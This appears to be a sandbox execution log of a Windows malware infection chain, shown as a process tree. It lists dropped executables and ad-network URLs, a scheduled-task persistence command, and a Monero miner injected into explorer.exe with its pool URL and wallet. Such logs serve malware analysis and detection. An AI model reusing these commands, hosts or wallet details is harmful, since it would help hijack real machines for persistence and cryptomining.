                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,10930203597432929941,11808743271813797593,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=53 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2712 /prefetch:1
                                                                                              10⤵
                                                                                                PID:9312
                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,10930203597432929941,11808743271813797593,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=55 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4676 /prefetch:1
                                                                                                10⤵
                                                                                                  PID:1188
                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,10930203597432929941,11808743271813797593,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=57 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1904 /prefetch:1
                                                                                                  10⤵
                                                                                                    PID:8820
                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2092,10930203597432929941,11808743271813797593,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4520 /prefetch:8
                                                                                                    10⤵
                                                                                                      PID:6852
                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,10930203597432929941,11808743271813797593,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=60 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5228 /prefetch:1
                                                                                                      10⤵
                                                                                                        PID:6108
                                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,10930203597432929941,11808743271813797593,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=62 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2712 /prefetch:1
                                                                                                        10⤵
                                                                                                          PID:6500
                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,10930203597432929941,11808743271813797593,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=64 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5768 /prefetch:1
                                                                                                          10⤵
                                                                                                            PID:9964
                                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,10930203597432929941,11808743271813797593,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=66 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5176 /prefetch:1
                                                                                                            10⤵
                                                                                                              PID:10084
                                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,10930203597432929941,11808743271813797593,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=68 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5376 /prefetch:1
                                                                                                              10⤵
                                                                                                                PID:10224
                                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,10930203597432929941,11808743271813797593,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=70 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5164 /prefetch:1
                                                                                                                10⤵
                                                                                                                  PID:1728
                                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,10930203597432929941,11808743271813797593,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=72 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1040 /prefetch:1
                                                                                                                  10⤵
                                                                                                                    PID:4304
                                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,10930203597432929941,11808743271813797593,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=74 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5604 /prefetch:1
                                                                                                                    10⤵
                                                                                                                      PID:4940
                                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,10930203597432929941,11808743271813797593,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=76 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5044 /prefetch:1
                                                                                                                      10⤵
                                                                                                                        PID:5596
                                                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,10930203597432929941,11808743271813797593,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=78 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3624 /prefetch:1
                                                                                                                        10⤵
                                                                                                                          PID:6228
                                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,10930203597432929941,11808743271813797593,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=80 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5324 /prefetch:1
                                                                                                                          10⤵
                                                                                                                            PID:1468
                                                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2092,10930203597432929941,11808743271813797593,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5256 /prefetch:8
                                                                                                                            10⤵
                                                                                                                              PID:5644
                                                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,10930203597432929941,11808743271813797593,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=83 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5420 /prefetch:1
                                                                                                                              10⤵
                                                                                                                                PID:5564
                                                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,10930203597432929941,11808743271813797593,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=84 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5652 /prefetch:1
                                                                                                                                10⤵
                                                                                                                                  PID:3284
                                                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,10930203597432929941,11808743271813797593,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=85 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4464 /prefetch:1
                                                                                                                                  10⤵
                                                                                                                                    PID:3408
                                                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,10930203597432929941,11808743271813797593,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=87 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5980 /prefetch:1
                                                                                                                                    10⤵
                                                                                                                                      PID:3340
                                                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,10930203597432929941,11808743271813797593,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=89 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5968 /prefetch:1
                                                                                                                                      10⤵
                                                                                                                                        PID:6064
                                                                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,10930203597432929941,11808743271813797593,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=91 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6132 /prefetch:1
                                                                                                                                        10⤵
                                                                                                                                          PID:6200
                                                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,10930203597432929941,11808743271813797593,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=93 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6028 /prefetch:1
                                                                                                                                          10⤵
                                                                                                                                            PID:6372
                                                                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,10930203597432929941,11808743271813797593,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=95 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6256 /prefetch:1
                                                                                                                                            10⤵
                                                                                                                                              PID:6444
                                                                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad
                                                                                                                                            9⤵
                                                                                                                                              PID:8080
                                                                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ff9e4a446f8,0x7ff9e4a44708,0x7ff9e4a44718
                                                                                                                                                10⤵
                                                                                                                                                  PID:8100
                                                                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=1851483
                                                                                                                                                9⤵
                                                                                                                                                  PID:504
                                                                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff9e4a446f8,0x7ff9e4a44708,0x7ff9e4a44718
                                                                                                                                                    10⤵
                                                                                                                                                      PID:2180
                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\42-2d5b7-c2e-1b894-851ce89937d1c\Jifavyraexu.exe
                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\42-2d5b7-c2e-1b894-851ce89937d1c\Jifavyraexu.exe"
                                                                                                                                                  8⤵
                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                  PID:5464
                                                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ltmrxvg3.5tw\GcleanerEU.exe /eufive & exit
                                                                                                                                                    9⤵
                                                                                                                                                      PID:5084
                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\ltmrxvg3.5tw\GcleanerEU.exe
                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\ltmrxvg3.5tw\GcleanerEU.exe /eufive
                                                                                                                                                        10⤵
                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                        PID:2028
                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 2028 -s 244
                                                                                                                                                          11⤵
                                                                                                                                                          • Program crash
                                                                                                                                                          • Checks processor information in registry
                                                                                                                                                          • Enumerates system info in registry
                                                                                                                                                          PID:9896
                                                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\12f3pcbd.xap\installer.exe /qn CAMPAIGN="654" & exit
                                                                                                                                                      9⤵
                                                                                                                                                        PID:9328
                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\12f3pcbd.xap\installer.exe
                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\12f3pcbd.xap\installer.exe /qn CAMPAIGN="654"
                                                                                                                                                          10⤵
                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                          • Enumerates connected drives
                                                                                                                                                          • Modifies system certificate store
                                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                          • Suspicious use of FindShellTrayWindow
                                                                                                                                                          PID:9448
                                                                                                                                                          • C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                            "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\12f3pcbd.xap\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\12f3pcbd.xap\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1630691530 /qn CAMPAIGN=""654"" " CAMPAIGN="654"
                                                                                                                                                            11⤵
                                                                                                                                                            • Enumerates connected drives
                                                                                                                                                            PID:2152
                                                                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\vyevvbun.laj\anyname.exe & exit
                                                                                                                                                        9⤵
                                                                                                                                                          PID:9588
                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\vyevvbun.laj\anyname.exe
                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\vyevvbun.laj\anyname.exe
                                                                                                                                                            10⤵
                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                            PID:9952
                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\vyevvbun.laj\anyname.exe
                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\vyevvbun.laj\anyname.exe" -u
                                                                                                                                                              11⤵
                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                              PID:10152
                                                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\5wswd2s2.ql1\gcleaner.exe /mixfive & exit
                                                                                                                                                          9⤵
                                                                                                                                                            PID:5924
                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\5wswd2s2.ql1\gcleaner.exe
                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\5wswd2s2.ql1\gcleaner.exe /mixfive
                                                                                                                                                              10⤵
                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                              PID:3884
                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 3884 -s 244
                                                                                                                                                                11⤵
                                                                                                                                                                • Program crash
                                                                                                                                                                • Checks processor information in registry
                                                                                                                                                                • Enumerates system info in registry
                                                                                                                                                                PID:5244
                                                                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                                                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\eqwgsseh.agc\autosubplayer.exe /S & exit
                                                                                                                                                            9⤵
                                                                                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                                                                                            PID:5624
                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                  C:\Windows\system32\cmd.exe /c Fri1553f0ee90.exe
                                                                                                                                                  4⤵
                                                                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                                                                  PID:836
                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zS0F1E7F93\Fri1553f0ee90.exe
                                                                                                                                                    Fri1553f0ee90.exe
                                                                                                                                                    5⤵
                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                    • Suspicious use of WriteProcessMemory
                                                                                                                                                    PID:1204
                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
                                                                                                                                                      6⤵
                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                      PID:4752
                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe
                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"
                                                                                                                                                        7⤵
                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                        PID:4736
                                                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                                                          "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
                                                                                                                                                          8⤵
                                                                                                                                                            PID:5336
                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                              schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
                                                                                                                                                              9⤵
                                                                                                                                                              • Creates scheduled task(s)
                                                                                                                                                              PID:3352
                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\services64.exe
                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\services64.exe"
                                                                                                                                                            8⤵
                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                            • Suspicious use of SetThreadContext
                                                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                            PID:5008
                                                                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                                                                              "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
                                                                                                                                                              9⤵
                                                                                                                                                                PID:9672
                                                                                                                                                                • C:\Windows\system32\schtasks.exe
                                                                                                                                                                  schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
                                                                                                                                                                  10⤵
                                                                                                                                                                  • Creates scheduled task(s)
                                                                                                                                                                  PID:9992
                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
                                                                                                                                                                9⤵
                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                PID:9788
                                                                                                                                                              • C:\Windows\explorer.exe
                                                                                                                                                                C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.add/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6O4DG/ZgkwoY7/pmBv4ks3wJ7PR9JPsLklOJLkitFc6Y" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth
                                                                                                                                                                9⤵
                                                                                                                                                                  PID:1620
                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe
                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe"
                                                                                                                                                              7⤵
                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                              PID:3796
                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\6846684.exe
                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\6846684.exe"
                                                                                                                                                                8⤵
                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                PID:4324
                                                                                                                                                                • C:\Windows\system32\WerFault.exe
                                                                                                                                                                  C:\Windows\system32\WerFault.exe -u -p 4324 -s 2304
                                                                                                                                                                  9⤵
                                                                                                                                                                  • Program crash
                                                                                                                                                                  • Checks processor information in registry
                                                                                                                                                                  • Enumerates system info in registry
                                                                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                  PID:4968
                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\6235990.exe
                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\6235990.exe"
                                                                                                                                                                8⤵
                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                PID:2572
                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\4342749.exe
                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\4342749.exe"
                                                                                                                                                                8⤵
                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                PID:5264
                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\6183785.exe
                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\6183785.exe"
                                                                                                                                                                8⤵
                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                PID:5428
                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 5428 -s 2240
                                                                                                                                                                  9⤵
                                                                                                                                                                  • Program crash
                                                                                                                                                                  • Checks processor information in registry
                                                                                                                                                                  • Enumerates system info in registry
                                                                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                  PID:6132
                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\2.exe
                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\2.exe"
                                                                                                                                                              7⤵
                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                              PID:2376
                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
                                                                                                                                                                8⤵
                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                PID:1444
                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 1444 -s 204
                                                                                                                                                                  9⤵
                                                                                                                                                                  • Program crash
                                                                                                                                                                  • Checks processor information in registry
                                                                                                                                                                  • Enumerates system info in registry
                                                                                                                                                                  PID:5704
                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\setup.exe
                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\setup.exe"
                                                                                                                                                              7⤵
                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                              PID:5020
                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 5020 -s 604
                                                                                                                                                                8⤵
                                                                                                                                                                • Program crash
                                                                                                                                                                • Checks processor information in registry
                                                                                                                                                                • Enumerates system info in registry
                                                                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                PID:5024
                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\Pubdate.exe
                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\Pubdate.exe"
                                                                                                                                                              7⤵
                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                              PID:3692
                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 3692 -s 296
                                                                                                                                                                8⤵
                                                                                                                                                                • Program crash
                                                                                                                                                                • Checks processor information in registry
                                                                                                                                                                • Enumerates system info in registry
                                                                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                PID:5456
                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\setup_2.exe
                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\setup_2.exe"
                                                                                                                                                              7⤵
                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                              PID:4292
                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\is-HM6UJ.tmp\setup_2.tmp
                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\is-HM6UJ.tmp\setup_2.tmp" /SL5="$10208,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe"
                                                                                                                                                                8⤵
                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                PID:3216
                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\setup_2.exe
                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT
                                                                                                                                                                  9⤵
                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                  PID:5300
                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\is-PGK92.tmp\setup_2.tmp
                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\is-PGK92.tmp\setup_2.tmp" /SL5="$30206,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT
